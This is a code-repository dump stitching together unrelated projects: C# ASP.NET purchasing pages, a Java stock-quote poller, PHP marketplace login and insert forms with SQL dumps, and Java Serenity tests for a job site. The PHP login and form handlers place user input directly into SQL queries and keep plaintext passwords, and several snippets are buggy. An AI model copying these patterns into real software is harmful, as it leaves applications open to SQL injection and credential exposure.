GridViewRow row = OtherItemsView.Rows[index];
int itemID = int.Parse(row.Cells[0].Text);
Label stockLabel = row.FindControl("StockNumb") as Label;
PurchaseOrdersList vendoritem = new PurchaseOrdersList();
List<PurchaseOrdersList> existing = BoughtItemsGridView(POrderResultsList);
existing.Add(vendoritem);
OtherItemsView.DataSource = existing;
OtherItemsView.DataBind();
List<PurchaseOrdersList> existingData = new List<PurchaseOrdersList>();
foreach (GridViewRow theRow in OtherItemsView.Rows)
{
itemID = int.Parse(theRow.Cells[0].Text);
existingData.Add(new PurchaseOrdersList());
}
existingData.RemoveAt(index);
OtherItemsView.DataSource = existingData;
OtherItemsView.DataBind();
}
private List<PurchaseOrdersList> BoughtItemsGridView(GridView gv)
{
List<PurchaseOrdersList> lists = new List<PurchaseOrdersList>();
foreach (GridViewRow row in gv.Rows)
{
int stockid = int.Parse(row.Cells[0].Text);
string desc = row.Cells[1].Text;
int qoh = int.Parse(row.Cells[2].Text);
int rol = int.Parse(row.Cells[3].Text);
int qoo = int.Parse(row.Cells[4].Text);
int pqty = int.Parse(row.Cells[5].Text);
decimal pprice = int.Parse(row.Cells[6].Text);
// Now I can create a ship object
PurchaseOrdersList frontLine = new PurchaseOrdersList();
// Add it to my list
lists.Add(frontLine);
}
return lists;
}
}<file_sep>using System;
namespace eTools.Data.Entities.Pocos
{
public class ViewPurchaseOrder
{
public int OrderNumber { get; set; }
public DateTime? DateOrdered { get; set; }
public string Name { get; set; }
public string ContactPhone { get; set; }
}
}
<file_sep>using eTools.Application.BLL;
using eTools.Data.Entities.Pocos;
using Microsoft.AspNet.Identity;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
public partial class Tasks_PlaceOrder : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
string username = User.Identity.GetUserName();
if (!IsPostBack)
{
if (!string.IsNullOrEmpty(username))
{
ShoppingCartItemData();
}
else
{
}
}
}
public void ShoppingCartItemData()
{
string username = User.Identity.GetUserName();
SalesController controller = new SalesController();
List<ShoppingCartItemList> itemList = new List<ShoppingCartItemList>();
itemList = controller.GetShoppingCartItems(username);
OrderReapter.DataSource = itemList;
OrderReapter.DataBind();
int shoppingCardID = controller.GetShoppingCartID(username);
decimal subTotal = controller.GetSubTotal(shoppingCardID);
lbl_subTotal.Text = subTotal.ToString();
lbl_total.Text = ((double)subTotal).ToString();
}
protected void Update_Click(object sender, EventArgs e)
{
SalesController controller = new SalesController();
if(!string.IsNullOrEmpty(lbl_discount.Text))
{
int discount = controller.GetCoupons(Coupon.Text);
lbl_discount.Text = (discount * double.Parse(lbl_subTotal.Text)*0.01).ToString();
lbl_total.Text = (double.Parse(lbl_subTotal.Text) * (1 - discount * 0.01)).ToString();
}
}
} | 53bba6f3569c9e48dbbab5f7ab9a87e471f0b8b7 | [
"Markdown",
"C#"
] | 22 | C# | SharkSix/ETools | 5dd50158cc8ce535c986546c2d1d12f9fd2243d2 | 9d8a40c1e54dce9f1d6331d8536d51bb7d9612b1 |
refs/heads/master | <repo_name>SatyaJupudi/TradingProject<file_sep>/Web: Integrated/src/com/trader/feedchecker/TestYahoo.java
package com.trader.feedchecker;
import java.sql.Connection;
import java.sql.Date;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.Calendar;
import java.util.Map;
import com.trader.util.OpenConnection;
// Get quote data from Yahoo, usage java TestYahoo <stock1> <stock2> ....
public class TestYahoo implements Runnable
{
private static String output;
private volatile boolean isRunning = true;
private volatile String[] symbols;
public TestYahoo(String... symbols) {
this.symbols = symbols;
}
public void start() {
if (symbols != null) {
float previous = 0;
ResultSet rs = null;
OpenConnection connectionPool = new OpenConnection("javaDemoDB");
connectionPool.start();
Connection con = connectionPool.getConnection();
GetYahooMarketData yahooReader = new GetYahooMarketData();
while (true)
{
if (isRunning == false) {
break;
}
// Get Quotes
Map<String, GetYahooMarketData.QuoteData> data = null;
try {
data = yahooReader.getQuote(symbols);
} catch (Exception e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
for (Map.Entry<String, GetYahooMarketData.QuoteData> entry :
data.entrySet())
{
GetYahooMarketData.QuoteData quote = entry.getValue();
String symbolName = entry.getKey();
if (previous == 0) {
try {
PreparedStatement pstSelect = con.prepareStatement("SELECT bid FROM tbl_SubscribedStocks WHERE symbol = ? ORDER BY ts DESC LIMIT 1");
pstSelect.setString(1, symbolName);
rs = pstSelect.executeQuery();
if (rs != null) {
rs.next();
previous = Float.parseFloat(rs.getString(1));
}
} catch (SQLException e) {
System.out.println(e);
}
}
if (quote.bidPrice != previous) {
try {
PreparedStatement pstInsert = con.prepareStatement("INSERT INTO tbl_SubscribedStocks VALUES (?, ?, ?, ?)");
pstInsert.setString(1, symbolName);
pstInsert.setString(2, Float.toString(quote.bidPrice));
pstInsert.setString(3, Float.toString(quote.askPrice));
pstInsert.setDate(4, new Date(Calendar.getInstance().getTimeInMillis()));
pstInsert.execute();
} catch(SQLException e) {
System.out.println(e);
}
}
previous = quote.bidPrice;
}
}
}
}
public void run() {
}
public static void main(String[] args) {
(new Thread(new TestYahoo())).start();
}
public void kill() {
isRunning = false;
}
/*public static void main(String[] args) throws Exception
{
GetYahooMarketData yahooReader = new GetYahooMarketData();
while (true)
{
// Get Quotes
Map<String, GetYahooMarketData.QuoteData> data =
yahooReader.getQuote(args);
for (Map.Entry<String, GetYahooMarketData.QuoteData> entry :
data.entrySet())
{
GetYahooMarketData.QuoteData quote = entry.getValue();
// System.out.printf ("%s [%dx%.2f] x [%.2fx%d]\n",
// entry.getKey(),
// quote.bidSize,
// quote.bidPrice,
// quote.askPrice,
// quote.askSize);
setOutput(
Float.toString(quote.bidSize +
quote.bidPrice +
quote.askPrice +
quote.askSize));
}
}
}*/
private static void setOutput(String output) {
TestYahoo.output = output;
}
public String getOutput() {
return output;
}
}
| 141999c868842008cf571557aba26c62471d1d2d | [
"Java"
] | 1 | Java | SatyaJupudi/TradingProject | a849f6cd1301f498cc672f83e885168e0363389d | a3731221c2882e240b538484d2c1a8b60c3936a8 |
refs/heads/master | <file_sep><?php
class Settings {
//////// ovde pisete gi vasite
private $ServerIP="127.0.0.1";
private $serverName="localhost";
private $userName="root";
private $password="<PASSWORD>";
private $dbName="pazari";
/////// getter-i za privatnite atributi
public function getServerName()
{
return $this->serverName;
}
public function getDbName()
{
return $this->dbName;
}
public function getUserName()
{
return $this->userName;
}
public function getPassword()
{
return $this->password;
}
}
class connection
{
/*
* promenliva za konstruktor na klasata settings
*/
private $sett;
/*
* konstruktor na klasata settings
*/
public function __construct(Settings $set) {
$this->sett = $set;
}
/*
* promenliva za konekcija
*/
private $conn;
/*
* pomosna promenliva koja se koristi za izvrsuvanje na kveri od PDO
*/
private $zemi;
/*
* bulova promenliva koja se koristi dali treba da se koristi select ili drugite vidovi na kverinja
*/
private $isSelect=false;
/*
* funkcija za zatvaranje na konekcijata
*/
function CloseDbConnection()
{
$this->conn =null;
}
/*
* funkcija koja se koristi za izvrsuvanje na kveri, avtomatski se otvora konekcija
*/
function execQuery($kveri,Settings $sett,$isSelect)
{
try
{
/*
* kreiranje na konekcija
*/
$this->conn=new PDO('mysql:host$sett->getServerName();dbname=$sett->getDbName()', $sett->getUserName(),$sett->getPassword());
$this->conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
/*
* priprema na kveri
*/
$zemi= $this->conn->prepare($kveri);
/*
* izvrsuvanje na kveri
*/
$zemi->execute();
if($isSelect==true)
{
/*
* dokolku ovoj atribut e 'True' togas ovoj kod se koristi za
* povlekuvanje na podatocite od select Stored procedurite
*
* se setira tipot na povlekuvanje na podatoci
*/
$zemi->setFetchMode(PDO::FETCH_ASSOC);
/*
* se smestuvaat vo promenlivata $result
*/
$result=$zemi->fetchAll();
/*
* pecatenje na rezultatite, Vnimanie : se koristi samo za testiranje
* ke ima tabeli za prikazuvanje
*/
print_r($result);
}
}
/*
* dokolku nema konekcija ke se prikazi greska
*/
catch (PDOException $e)
{
print "Error!: " . $e->getMessage() . "<br/>";
}
}
}
?>
<file_sep>
<html>
<body>
<?php
$name = false;
$price = false;
$description = false;
$ID = false;
if(isset($_POST['name'])){
$name = $_POST['name'];
}
if(isset($_POST['price'])){
$price = $_POST['price'];
}
if(isset($_POST['description'])){
$description = $_POST['description'];
}
if(isset($_POST['id'])){
$ID = $_POST['id'];
}
$dbc = mysqli_connect('localhost','root','','proba');
$query = "INSERT INTO products (Name, Price, Description, ID) VALUES('$name','$price','$description','$ID')";
$vnes = mysqli_query($dbc,$query);
mysqli_close($dbc);
echo "Vnesot beshe uspeshen.";
?>
</body>
</html><file_sep><?php
/*
* treba da se promeni kodot za koristenje na PDO, vidi includes/settings.php
*/
if(!isset($_POST['submit'])){
$username = $_POST["username"];
$password = $_POST["password"];
}
$con = mysql_connect("localhost", "root","sudo");
if(!$con){
die('Database does not exist'. mysql_error()) ;
}
mysql_select_db("Proba", $con);
if(!$_POST['username'] | !$_POST['password'])
{
echo(" <SCRIPT LANGUGAGE='JavaScript'>
window.alert('You did not complete all the required fields')
window.location.href='index.php'
</SCRIPT>");
exit();
}
if(mysql_num_rows(mysql_query("SELECT * FROM login_users WHERE username= '$username' AND password = <PASSWORD>'"))>0)
{
echo ("<SCRIPT LANGUAGE='JavaScript'>
window.alert('Login Succesfully!. You are logged in as $username. Continue?')
window.location.href='dashboard.html'
</SCRIPT>");
exit();
}
else{
mysql_close($con);
echo $_COOKIE['uid'];
echo("<SCRIPT LANGUGAGE='JavaScript'>
window.alert('Wrong username and password combination. Please re-enter.')
window.location.href='index.php'
</SCRIPT>");
exit();
}
<file_sep><?php
echo'
<!DOCTYPE html>
<html lang="mk">
<head>
<title>ЈП ПАЗАРИ</title>
<meta charset="utf-8">
<link href="includes/index.css" rel="stylesheet" type="text/css"/>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<div id="container">
<form method="post" action="Forms/login.php">
</br><h2>ЈП ПАЗАРИ</h2></br>
<label for="ime">Корисничко име</label><br>
<input type="text" id="username" name="username" value="" ></br></br>
<label for="lozinka">Лозинка<label><br>
<input type="<PASSWORD>" id="password" name="password"></br></br>
<input type="submit" value="Најави се">
</form>
</div>
</body>
</html>
';<file_sep><?php
require_once '../../includes/settings.php';
$obj=new connection(new Settings());
if(!isset($_POST['submit'])){
$IDfier = $_POST["IDfier"];
$name = $_POST["name"];
$surname = $_POST["surname"];
$mail=$_POST["mail"];
$address = $_POST["address"];
$embg = $_POST["embg"];
$phone = $_POST["phone"];
$date=$_POST["date"];
$Password = $_POST["Password"];
$role=$_POST["role"];
}
$query = "CALL pazari.insertUsers('$address','$date','$mail','$embg','$IDfier','$name','$Password','$phone','$surname',2)";
$obj->execQuery($query,new Settings(),false);
$obj->CloseDbConnection();
header("Location: ../userform.html");
<file_sep><?php
require_once '../../includes/settings.php';
$obj=new connection(new Settings());
if(!isset($_POST['submit'])){
$name = $_POST["name"];
$idfier = $_POST["idfier"];
$desc=$_POST["desc"];
}
$query = "CALL pazari.insertArea('$name','$desc','$idfier')";
$obj->execQuery($query,new Settings(),false);
$obj->CloseDbConnection();
header("Location: ../areaform.html");
<file_sep><?php
require_once '../../includes/settings.php';
$obj=new connection(new Settings());
if(!isset($_POST['submit'])){
$name = $_POST["name"];
$price = $_POST["price"];
$createdAt = $_POST["dateCrAt"];
$desc=$_POST["desc"];
}
$query = "CALL pazari.insertProducts('$createdAt','$desc','$name','$price')";
$obj->execQuery($query,new Settings(),false);
$obj->CloseDbConnection();
header("Location: ../productsform.html");
<file_sep><?php
require_once '../../includes/settings.php';
$obj=new connection(new Settings());
if(!isset($_POST['submit'])){
$price = $_POST["price"];
$crAT = $_POST["crAT"];
$idfier = $_POST["option"];
$desc=$_POST["desc"];
}
$query = "CALL pazari.insertPayments('$crAT','$idfier','$price','$desc')";
$obj->execQuery($query,new Settings(),false);
$obj->CloseDbConnection();
header("Location: ../paymentsform.html");
<file_sep># Marketplace-project
A project developed using PHP and phpmyadmin database.
| 1db56be079808ae4668b66938984c2c0833a5b5d | [
"Markdown",
"PHP"
] | 9 | PHP | MartinaSoluncevska/Marketplace | 9c634a2b0faf8223a5e2e0b57e6c3366a289ec0b | e75a32ee19d22210a4c2282cc58559051b69bb01 |
refs/heads/master | <repo_name>AbdulKShahid/Application-Java<file_sep>/IamCore/sql/sql.sql
create schema "ROOT"
CREATE TABLE IDENTITIES
(IDENTITY_ID INT NOT NULL GENERATED ALWAYS AS IDENTITY,
uid VARCHAR(255) NOT NULL PRIMARY KEY,
display_name VARCHAR(255),
email_id VARCHAR(255),
password VARCHAR(255) NOT NULL
);
ALTER TABLE IDENTITIES ADD COLUMN password varchar(255);
DROP TABLE IDENTITIES;<file_sep>/IamCore/src/services/IdentityDAO.java
package services;
import java.util.List;
import datamodel.Identity;
import exception.DaoCreateException;
import exception.DaoDeleteException;
import exception.DaoUpdateException;
public interface IdentityDAO {
public void create(Identity identity) throws DaoCreateException;
public void update(Identity identity) throws DaoUpdateException;
public void delete(Identity identity) throws DaoDeleteException;
public List<Identity> search(Identity criteria);
}
<file_sep>/IamCore/src/services/LoginDAO.java
package services;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import logger.Logger;
public class LoginDAO {
private static final Logger logger = new Logger(LoginDAO.class);
// TODO Auto-generated method stub
/**
*
* @param uid The uid
* @param password The <PASSWORD>
* @return res
* <h3>Description</h3>
* <p>
* This method is used to perform the authentication and then find out if the user has entered the correct credentials
* </p>
*
* <h3>Usage</h3>
* <p>
* It should be used as follows :
* This can be done by comparing the uid and passaord to the database and check if they are present and they match
* and the user is given access to his account
* </p>
*/
public boolean Authentication(String uid, String password) {
// TODO Auto-generated method stub
boolean res = false;
try {
Connection con = Dbconnection.getconnection();
PreparedStatement statement = con
.prepareStatement("select * from IDENTITIES where UID=? and PASSWORD=?");
statement.setString(1, uid);
statement.setString(2, password);
ResultSet result = statement.executeQuery();
if (result.next()) {
res = true;
} else {
System.out.println("Invalid username or password!");
}
} catch (Exception e) {
logger.error("DB related Error");
e.printStackTrace();
}
return res;
}
}
<file_sep>/IamCore/src/datamodel/Identity.java
package datamodel;
public class Identity {
/**
* @return uid
* * * * <h3>Description</h3>
* <p>
* This method is used to get the uid stored in this identity
* </p>
*/
public String getUid() {
return uid;
}
/**
* @param uid
* * * * <h3>Description</h3>
* <p>
* This method is used to set the uid value in this identity
* </p>
*/
public void setUid(String uid) {
this.uid = uid;
}
/**
* @return display_name
* * * * <h3>Description</h3>
* <p>
* This method is used to get the display_name stored in this identity
* </p>
*/
public String getDisplay_name() {
return display_name;
}
/**
* @param display_name
* * * * <h3>Description</h3>
* <p>
* This method is used to set the display name in this identity
* </p>
*/
/**
* @param display_name
*
*/
public void setDisplay_name(String display_name) {
this.display_name = display_name;
}
/**
* @return email_id
* * * * <h3>Description</h3>
* <p>
* This method is used to get the email id from this identity
* </p>
*/
public String getEmail_id() {
return email_id;
}
/**
* @param email_id
* * * * <h3>Description</h3>
* <p>
* This method is used to set the email id in this identity
* </p>
*/
public void setEmail_id(String email_id) {
this.email_id = email_id;
}
private String uid;
@Override
public String toString() {
return "display_name=" + display_name + " \nEmail_id=" + email_id + "\nUser Id=" + uid + "";
}
private String display_name;
private String email_id;
private String password;
/**
* @return password
* * <h3>Description</h3>
* <p>
* This method is used to get the password of the current identity
* </p>
*
*/
public String getPassword() {
return password;
}
/**
* @param password
* * * <h3>Description</h3>
* <p>
* This method is used to set the password in this identity
* </p>
*/
public void setPassword(String password) {
this.password = <PASSWORD>;
}
}
| de8f7de25b791962879b9f5cbfd7887719e3f394 | [
"Java",
"SQL"
] | 4 | SQL | AbdulKShahid/Application-Java | 98940ede070f2d2693566a55b87ebc3198766a1b | 44e3149fc62313dab6020c794855c7b507c820a1 |
refs/heads/master | <repo_name>mahbubhssn/Delicious<file_sep>/README.md
# Delicious
This is a dynamic website for any restaurant. Any user as well as the owner of the restaurant can easily maintain their necessary role by using this. User can check the item with offered price and then order online. owner can see those order on their personal URL hidden from the user. User Role: Check different types of item, Order online. Owner Role: Insert their available item, Edit Delete Update item, Check order list.
<file_sep>/delicious.sql
-- phpMyAdmin SQL Dump
-- version 4.7.0
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Nov 29, 2017 at 08:20 AM
-- Server version: 10.1.26-MariaDB
-- PHP Version: 7.1.8
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `delicious`
--
-- --------------------------------------------------------
--
-- Table structure for table `item`
--
CREATE TABLE `item` (
`item_id` int(10) NOT NULL,
`item_name` varchar(50) NOT NULL,
`category` varchar(20) NOT NULL,
`price` int(20) NOT NULL,
`description` text NOT NULL,
`img_name` varchar(50) NOT NULL,
`img_path` varchar(50) NOT NULL,
`img_type` varchar(50) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `item`
--
INSERT INTO `item` (`item_id`, `item_name`, `category`, `price`, `description`, `img_name`, `img_path`, `img_type`) VALUES
(1, 'Special Pudding', 'Desert', 100, 'As desire', '1.jpg', 'photo/1.jpg', 'image/jpeg'),
(2, 'Brawnie', 'Desert', 100, 'As desire', '2.jpg', 'photo/2.jpg', 'image/jpeg'),
(3, 'Vanilla Icecream', 'Desert', 100, 'As desire', '3.jpg', 'photo/3.jpg', 'image/jpeg'),
(4, 'Special Mix Icecream', 'Desert', 200, 'Enough for one person', '4.jpg', 'photo/4.jpg', 'image/jpeg');
-- --------------------------------------------------------
--
-- Table structure for table `order`
--
CREATE TABLE `order` (
`order_id` int(10) NOT NULL,
`item1` varchar(50) NOT NULL,
`quantity1` varchar(50) NOT NULL,
`item2` varchar(50) NOT NULL,
`quantity2` varchar(50) NOT NULL,
`item3` varchar(50) NOT NULL,
`quantity3` varchar(50) NOT NULL,
`fname` varchar(50) NOT NULL,
`lname` varchar(50) NOT NULL,
`email` varchar(50) NOT NULL,
`street` varchar(50) NOT NULL,
`area` varchar(50) NOT NULL,
`city` varchar(20) NOT NULL,
`zip` int(20) NOT NULL,
`country` varchar(50) NOT NULL,
`c_num` varchar(14) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `order`
--
INSERT INTO `order` (`order_id`, `item1`, `quantity1`, `item2`, `quantity2`, `item3`, `quantity3`, `fname`, `lname`, `email`, `street`, `area`, `city`, `zip`, `country`, `c_num`) VALUES
(2, 'Pudding', '1', '', '', '', '', 'Mahbub', 'Hossain', '<EMAIL>', 'GA-87', 'Middle Badda', 'Dhaka', 1212, 'Bangladesh', '+8801521109326');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `item`
--
ALTER TABLE `item`
ADD PRIMARY KEY (`item_id`);
--
-- Indexes for table `order`
--
ALTER TABLE `order`
ADD PRIMARY KEY (`order_id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `item`
--
ALTER TABLE `item`
MODIFY `item_id` int(10) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `order`
--
ALTER TABLE `order`
MODIFY `order_id` int(10) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/Delicious/database/tbl_order.php
<?php
include("config.php");
$tbl_order = "CREATE TABLE IF NOT EXISTS `order`(
order_id INT(10) NOT NULL AUTO_INCREMENT, PRIMARY KEY(order_id),
item1 VARCHAR(50) NOT NULL,
quantity1 VARCHAR(50) NOT NULL,
item2 VARCHAR(50) NOT NULL,
quantity2 VARCHAR(50) NOT NULL,
item3 VARCHAR(50) NOT NULL,
quantity3 VARCHAR(50) NOT NULL,
fname VARCHAR(50) NOT NULL,
lname VARCHAR(50) NOT NULL,
email VARCHAR(50) NOT NULL,
street VARCHAR(50) NOT NULL,
area VARCHAR(50) NOT NULL,
city VARCHAR(20) NOT NULL,
zip INT(20) NOT NULL,
country VARCHAR(50) NOT NULL,
c_num VARCHAR(14) NOT NULL)";
$sql = mysqli_query($myconn,$tbl_order);
?><file_sep>/Delicious/database/tbl_item.php
<?php
include("config.php");
$tbl_item = "CREATE TABLE IF NOT EXISTS item(
item_id INT(10) NOT NULL AUTO_INCREMENT, PRIMARY KEY(item_id),
item_name VARCHAR(50) NOT NULL,
category VARCHAR(20) NOT NULL,
price INT(20) NOT NULL,
description TEXT NOT NULL,
img_name VARCHAR(50) NOT NULL,
img_path VARCHAR(50) NOT NULL,
img_type VARCHAR(50) NOT NULL)";
$sql = mysqli_query($myconn,$tbl_item);
?> | 814bef8f5a7fe7f15df9756f0f27d9949bc58a5e | [
"Markdown",
"SQL",
"PHP"
] | 4 | Markdown | mahbubhssn/Delicious | 40a2a6aa07d400e4a18e2abb614d062f2050f9ee | 3d79c492da185e4c0cbc3df6e379d2a1ecefb6f8 |
refs/heads/master | <file_sep>package BinarySearch;
public class BinarySearchAlgorithm {
public static void main(String[] args) {
int arr[] = {-4,-1,3,7,10,11};
int n = arr.length;
int target = 11;
// int ans1 = binarySearch1(arr,target);
// if(ans1 == -1)
// {
// System.out.println(target+ " is not present in the array");
// }
// else
// {
// System.out.println(target + " present at " + ans1 + " index");
// }
int low = 0;
int high = n - 1;
int ans2 = binarySearch2(arr,target,low,high);
//T.C. = O(Logn), S.C. = O(Logn) //Slower
if(ans2 == -1)
{
System.out.println(target+ " is not present in the array");
}
else
{
System.out.println(target + " present at " + ans2 + " index");
}
}
static int binarySearch1(int a[], int target)
{
int n = a.length;
int low = 0;
int high = n - 1;
while(low <= high)
{
int mid = (low + high) / 2;
if(a[mid] == target)
{
return mid;
}
else if(a[mid] < target)
{
low = mid + 1;
}
else
{
high = mid - 1;
}
}
return -1;
}
static int binarySearch2(int a[], int target, int low, int high)
{
if(low > high) return -1;
int mid = (low + high) / 2;
if(a[mid] == target) return mid;
if(a[mid] < target)
{
return binarySearch2(a,target,mid+1,high);
}
return binarySearch2(a,target,low,mid-1);
}
}
<file_sep>package BinarySearch;
public class SearchInfiniteSortedArray {
public static void main(String[] args) {
int a[] = {1,3,7,8,12,58,72,89,90,98,99,123,234,345,456,567,678,789};
int target = 124;
int ans = searchInfinite(a,target);
if(ans == -1)
{
System.out.println(target+" not present");
}
else
{
System.out.println(target+" present inside the array at "+ans+" index");
}
}
static int searchInfinite(int a[], int target)
{
int low = 0;
int high = 1;
while(a[high] < target)
{
low = high;
high = 2 * high;
}
return binarySearch(a,target,low,high);
}
static int binarySearch(int a[], int key, int low, int high)
{
while(low <= high)
{
int mid = (low + high) / 2;
if(a[mid] == key)
{
return mid;
}
else if(a[mid] < key)
{
low = mid + 1;
}
else
{
high = mid - 1;
}
}
return -1;
}
}
| d699f4aae4054f547ff6b4519f0015f131655110 | [
"Java"
] | 2 | Java | Dhruvil17/Hactoberfest-2021 | 60423606cf83c4eb0f232826418651ddea6328ab | 7669db093c36f7f6eb6528d829565b5112218ccc |
refs/heads/master | <repo_name>albertolopez9304/ChoucairEmpleos<file_sep>/src/main/java/co/com/choucairempleos/questions/VerifyJobs.java
package co.com.choucairempleos.questions;
import co.com.choucairempleos.userinterface.SearchJobsPage;
import net.serenitybdd.screenplay.Actor;
import net.serenitybdd.screenplay.Question;
import net.serenitybdd.screenplay.questions.Text;
public class VerifyJobs implements Question<Boolean> {
private String keyword;
public VerifyJobs(String keyword) {
this.keyword = keyword;
}
public static VerifyJobs with(String keywords) {
return new VerifyJobs(keywords);
}
@Override
public Boolean answeredBy(Actor actor) {
String expectedJobs = Text.of(SearchJobsPage.VERIFY_JOBS).viewedBy(actor).asString();
System.out.println(keyword);
System.out.println(expectedJobs);
return (expectedJobs.equals(keyword));
}
}
<file_sep>/src/main/java/co/com/choucairempleos/questions/VerifyMessageError.java
package co.com.choucairempleos.questions;
import co.com.choucairempleos.userinterface.RegisterForApplyPage;
import net.serenitybdd.screenplay.Actor;
import net.serenitybdd.screenplay.Question;
import net.serenitybdd.screenplay.questions.Text;
public class VerifyMessageError implements Question<Boolean> {
private String messageFailed;
public VerifyMessageError(String messageFailed) {
this.messageFailed = messageFailed;
}
public static VerifyMessageError with(String messageFailed) {
return new VerifyMessageError(messageFailed);
}
@Override
public Boolean answeredBy(Actor actor) {
String expectedMessageFailed = Text.of(RegisterForApplyPage.CV_IS_REQUIRED).viewedBy(actor).asString();
return (expectedMessageFailed.equals(messageFailed));
}
}
<file_sep>/src/main/java/co/com/choucairempleos/model/DataUser.java
package co.com.choucairempleos.model;
public class DataUser {
private String city;
private String keywords;
public String getCity() {
return city;
}
public String getKeywords() {
return keywords;
}
}
<file_sep>/settings.gradle
rootProject.name = 'co.com.choucairempleos'
<file_sep>/src/main/java/co/com/choucairempleos/userinterface/RegisterForApplyPage.java
package co.com.choucairempleos.userinterface;
import net.serenitybdd.screenplay.targets.Target;
import org.openqa.selenium.By;
public class RegisterForApplyPage {
public static final Target APPLY_FOR_JOB = Target.the("Button Apply For Job").located(By.xpath("//input[@class=\"application_button button\"]"));
public static final Target SCROLL = Target.the("Button Apply For Job").located(By.xpath("//*[@id=\"post-7547\"]/div/div[2]/div[2]/p[3]/strong"));
public static final Target FULL_NAME = Target.the("Full Name").located(By.id("nombre-completo"));
public static final Target EMAIL = Target.the("Email").located(By.id("correo-electronico"));
public static final Target PHONE = Target.the("Phone").located(By.id("celular-o-telefono-de-contacto"));
public static final Target FORMAL_STUDIES = Target.the("Formal Studies").located(By.id("que-estudios-formales-tienes-o-en-que-semestre-te-encuentras-actualmente"));
public static final Target EXPERIENCE = Target.the("Experience").located(By.id("que-tiempo-de-experiencia-certificada-tienes-en-pruebas-o-en-desarrollo-de-softwaresi-aplica"));
public static final Target KNOW_AUTOMATION = Target.the("Know Automation").located(By.id("conoces-de-automatizacion-de-pruebas-te-gustaria-aprendersi-aplica"));
public static final Target SALARY = Target.the("Salary").located(By.id("cual-es-tu-aspiracion-salarial"));
public static final Target AVAILABILITY = Target.the("Availability").located(By.id("si-eres-seleccionado-que-disponibilidad-de-tiempo-para-ingresar-tendrias"));
public static final Target MESSAGE = Target.the("Additional Message").located(By.id("mensaje-adicional"));
public static final Target SEND_APLICATION = Target.the("Button Send Aplication").located(By.xpath("//input[@class=\"button wp_job_manager_send_application_button\"]"));
public static final Target CV_IS_REQUIRED = Target.the("Message Expected").located(By.xpath("//*[contains(text(), '\"CV\" is a required field')]"));
}
<file_sep>/src/test/java/co/com/choucairempleos/runners/ChoucairJobsRunner.java
package co.com.choucairempleos.runners;
import cucumber.api.CucumberOptions;
import cucumber.api.SnippetType;
import net.serenitybdd.cucumber.CucumberWithSerenity;
import org.junit.runner.RunWith;
@RunWith(CucumberWithSerenity.class)
@CucumberOptions(
features = "src/test/resources/features/choucairJobs.feature",
tags = "@stories",
glue = {"co.com.choucairempleos.stepdefinitions","co.com.choucairempleos.util"},
snippets = SnippetType.CAMELCASE)
public class ChoucairJobsRunner {
}
<file_sep>/src/main/java/co/com/choucairempleos/util/Constant.java
package co.com.choucairempleos.util;
public class Constant {
public static final String URL_BASE = "https://www.choucairtesting.com";
public static final int ZERO = 0;
}<file_sep>/src/main/java/co/com/choucairempleos/task/RegisterForApply.java
package co.com.choucairempleos.task;
import co.com.choucairempleos.model.ApplyForJobsData;
import static co.com.choucairempleos.userinterface.RegisterForApplyPage.*;
import net.serenitybdd.screenplay.Actor;
import net.serenitybdd.screenplay.Task;
import net.serenitybdd.screenplay.Tasks;
import net.serenitybdd.screenplay.actions.*;
public class RegisterForApply implements Task {
private ApplyForJobsData applyForJobsData;
public RegisterForApply(ApplyForJobsData applyForJobsData) {this.applyForJobsData = applyForJobsData;}
public static RegisterForApply onThePageWith(ApplyForJobsData applyForJobsData) {
return Tasks.instrumented(RegisterForApply.class, applyForJobsData);
}
@Override
public <T extends Actor> void performAs(T actor) {
actor.attemptsTo(
Scroll.to(SCROLL),
Click.on(APPLY_FOR_JOB),
Enter.theValue(applyForJobsData.getName()).into(FULL_NAME),
Enter.theValue(applyForJobsData.getEmail()).into(EMAIL),
Enter.theValue(applyForJobsData.getPhone()).into(PHONE),
Enter.theValue(applyForJobsData.getFormalStudies()).into(FORMAL_STUDIES),
Enter.theValue(applyForJobsData.getCertifiedExperience()).into(EXPERIENCE),
Enter.theValue(applyForJobsData.getKnowAutomation()).into(KNOW_AUTOMATION),
Enter.theValue(applyForJobsData.getWageAspiration()).into(SALARY),
Enter.theValue(applyForJobsData.getTimeAvailability()).into(AVAILABILITY),
Enter.theValue(applyForJobsData.getAdditionalMessage()).into(MESSAGE),
Scroll.to(AVAILABILITY),
Click.on(SEND_APLICATION)
);
}
}
| f768f0d91473887c8fdcef9467108eded23c3111 | [
"Java",
"Gradle"
] | 8 | Java | albertolopez9304/ChoucairEmpleos | 4981b9a2c8904c0a97ddb5f7cabc62ed62808d8f | d3a2639afa6690a04e7c12e91decc340609a1ea9 |
refs/heads/master | <repo_name>yayyuh/Github<file_sep>/hpe wty req with GUI.py
import requests
import json
